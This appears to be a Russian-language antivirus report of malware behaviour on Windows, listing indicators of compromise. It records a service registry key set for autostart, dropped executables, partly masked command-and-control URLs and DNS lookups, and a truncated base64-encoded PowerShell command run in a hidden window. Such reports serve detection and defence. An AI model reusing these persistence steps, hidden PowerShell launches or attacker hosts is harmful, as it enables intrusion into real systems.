Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\cmutil] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\cmutil] 'ImagePath' = '"<SYSTEM32>\NlsData0816\cmutil.exe"'
- 'cmutil' "<SYSTEM32>\NlsData0816\cmutil.exe"
- 'cmutil' <SYSTEM32>\NlsData0816\cmutil.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAZQA2AHkAOQBmAD0AKAAoACcAWgBtACcAKwAnAHMAJwApACsAKAAnAHIAbwAnACsAJwByAGoAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBlAHIAUAByAE8AZgBpAGwARQBcAEwAVAAwAE...
- %HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe
- <SYSTEM32>\nlsdata0816\cmutil.exe
- %HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe в <SYSTEM32>\nlsdata0816\cmutil.exe
- '19#.#58.216.73':80
- http://ja##uh.nl/system/5UMD6dd/
- http://eq##am.de/cgi-bin/3y/
- http://19#.#58.216.73/KqxWVTShGHQPW/DQ0GcYUjTqHEft/G0qImJC4/Hjtb/TgQ5RX/WzpmZzsamnjJU/
- DNS ASK ja##uh.nl
- DNS ASK eq##am.de
- '%HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe'
- '<SYSTEM32>\nlsdata0816\cmutil.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAZQA2AHkAOQBmAD0AKAAoACcAWgBtACcAKwAnAHMAJwApACsAKAAnAHIAbwAnACsAJwByAGoAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBlAHIAUAByAE8AZgBpAGwARQBcAEwAVAAwAE...' (со скрытым окном)